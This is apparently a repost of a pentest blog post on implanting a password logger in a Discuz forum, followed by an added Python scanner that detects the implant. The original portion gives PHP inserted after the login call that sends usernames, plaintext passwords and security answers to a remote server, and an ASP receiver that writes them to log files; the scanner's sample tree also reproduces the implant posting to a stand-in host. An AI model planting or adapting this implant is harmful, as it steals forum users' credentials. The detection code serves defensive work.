http://www.80pentest.com/?p=835
Logging passwords in DZ (Discuz): I wrote my own version of the code.
Insert a custom function into include/common.inc.php.
I chose to put it at lines 41-53. For dz7.1-7.2 the login code is in include/login.func.php (lines 49-51); for dz7.0 it is in logging.php in the site root.
    function request_by_other( $remote_server , $post_string ){
        // (the lines that open the $context array are omitted on the page)
        'header' => 'Content-type: application/x-www-form-urlencoded' . "\r\n" .
                    'User-Agent : xxbing\'s fuckyou!!!' . "\r\n" .
                    // PHP 5/7 evaluate this left to right as ('Content-length: ' . strlen(...)) + 8,
                    // so the header value is lost; parenthesise strlen($post_string)+8 to get the intended string
                    'Content-length: ' . strlen ( $post_string )+8,
        'content' => 'mypost=' . $post_string )
        // (one line omitted on the page)
        $stream_context = stream_context_create( $context );
        $data = file_get_contents ( $remote_server ,FALSE, $stream_context );
Open logging.php in the site root and search for the following code:
    $ucresult = uc_user_login( $username , $password , $loginfield == 'uid' );
Then insert the following code right after it:
    if ( $username != 'admin' ){
        // UTC+8 timestamp for the log entry
        $showtime = gmdate ( "Ynj H:i:s" ,time()+8*3600);
        // (intervening lines, including the call that sends $post_string, are omitted on the page)
        $post_string = 'name1=' . $name2 . '&name=' . $username . '&password=' . $password . '&questionid=' . $questionid . '&answer=' . $answer . '&showtime=' . $showtime . '&from=' . $_SERVER [ 'SERVER_NAME' ];
Since I am familiar with ASP, I wrote the receiving end in ASP.
The ASP code is as follows:
    'body0 = request.form( "name1" )
    body1 = request.form( "name" )
    body2 = request.form( "password" )
    body3 = request.form( "questionid" )
    body4 = request.form( "answer" )
    body5 = request.form( "showtime" )
    body7 = request.form( "from" )
    ' labels: 账号 = account, 密码 = password, 问题ID = question ID, 答案 = answer, 时间 = time, 来源 = source
    body6 = "账号:" &body1 & "---密码:" & body2 & "---问题ID:" & body3 & "---答案:" & body4 & "---时间:" & body5 & "---来源:" & body7
    FileName = date ()& ".txt"
    ' The Replace is there for compatibility with IIS7, where date() can contain "/".
    FileName = Replace(FileName, "/" , "-" )
    Call CreateFile(body6,FileName)
    Sub CreateFile(body,FileName)
        Set fso = CreateObject( "Scripting.FileSystemObject" )
        ' 8 = ForAppending, True = create if missing, 0 = ASCII
        Set tf = fso.openTextFile(server.mappath(FileName),8,True,0)
        tf.WriteLine "----------------"
        ' (the fragment is cut off here on the page)
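The defender's side of the procedure above: the implant has two halves, an outbound POST helper dropped into include/common.inc.php (or login.func.php) and a line next to uc_user_login() that concatenates the plaintext password into a query string. The scanner below is an added editor's check, not code from the original post, and looks for exactly those two halves across a Discuz tree. The regexes are heuristics and the sample files are constructed stand-ins that only approximate the real Discuz 7 sources; in practice pair this with a diff against a pristine copy of the same release.

```python
"""Editor's added check (not from the original post): flag the login-logging implant
described above by scanning a Discuz tree for its two halves, the outbound POST helper
and the plaintext-credential concatenation next to uc_user_login()."""
import re
from typing import Dict, List, Tuple

# One regex per indicator. Names and the sample trees below are the editor's assumptions.
INDICATORS: List[Tuple[str, re.Pattern]] = [
    # 'password=' . $password  -> the plaintext credential is being put on the wire
    ("plaintext_password_concat", re.compile(r"password=['\"]\s*\.\s*\$password\b")),
    # hand-rolled HTTP client; stock Discuz 7 reaches UCenter through its own uc_* helpers
    ("outbound_http", re.compile(r"\b(stream_context_create|fsockopen|curl_init)\s*\(")),
    # fetch of a URL held in a variable, the other half of the helper on this page
    ("remote_fetch", re.compile(r"file_get_contents\s*\(\s*\$\w+")),
    # the login call the implant is inserted after; context, not suspicious by itself
    ("login_call", re.compile(r"\buc_user_login\s*\(")),
]


def scan_file(path: str, source: str) -> List[dict]:
    """Return every indicator hit in one PHP source, with path and line number."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, pattern in INDICATORS:
            if pattern.search(line):
                hits.append({"path": path, "line": lineno,
                             "indicator": name, "text": line.strip()})
    return hits


def assess(tree: Dict[str, str]) -> dict:
    """Combine hits across files. suspicious is True when some login handler concatenates
    the plaintext password into a string AND some file in the tree carries an outbound
    HTTP channel; the two halves live in different files on this page."""
    hits = [h for path, src in tree.items() for h in scan_file(path, src)]
    by_file: Dict[str, set] = {}
    for h in hits:
        by_file.setdefault(h["path"], set()).add(h["indicator"])
    leak_files = [p for p, names in by_file.items()
                  if {"plaintext_password_concat", "login_call"} <= names]
    channel_files = [p for p, names in by_file.items()
                     if names & {"outbound_http", "remote_fetch"}]
    return {"suspicious": bool(leak_files) and bool(channel_files),
            "leak_files": leak_files, "channel_files": channel_files, "hits": hits}


# Constructed sample tree approximating an unmodified install (not verbatim Discuz source).
CLEAN_TREE: Dict[str, str] = {
    "include/common.inc.php": "<?php\n$timestamp = time();\n",
    "logging.php": """<?php
$ucresult = uc_user_login($username, $password, $loginfield == 'uid');
list($uid, $username, $password, $email) = daddslashes($ucresult, 1);
""",
}

# Constructed sample tree with the implant from this page in place (receiver URL is made up).
IMPLANTED_TREE: Dict[str, str] = {
    "include/common.inc.php": """<?php
function request_by_other($remote_server, $post_string) {
    $context = array('http' => array(
        'method'  => 'POST',
        'header'  => "Content-type: application/x-www-form-urlencoded\\r\\n",
        'content' => 'mypost=' . $post_string));
    $stream_context = stream_context_create($context);
    return file_get_contents($remote_server, FALSE, $stream_context);
}
""",
    "logging.php": """<?php
$ucresult = uc_user_login($username, $password, $loginfield == 'uid');
if ($username != 'admin') {
    $showtime = gmdate("Ynj H:i:s", time() + 8 * 3600);
    $post_string = 'name=' . $username . '&password=' . $password . '&showtime=' . $showtime;
    request_by_other('http://receiver.example/log.asp', $post_string);
}
""",
}

if __name__ == "__main__":
    for label, tree in (("clean", CLEAN_TREE), ("implanted", IMPLANTED_TREE)):
        verdict = assess(tree)
        print(f"{label}: suspicious={verdict['suspicious']}")
        for h in verdict["hits"]:
            print(f"  {h['path']}:{h['line']} {h['indicator']}: {h['text']}")
```

Run it against a real web root by reading every .php file into the dict keyed by relative path; a hit on plaintext_password_concat inside any login handler is worth a manual look even when no outbound channel is found, since the sender could equally be a curl call on a different host or a later cron job.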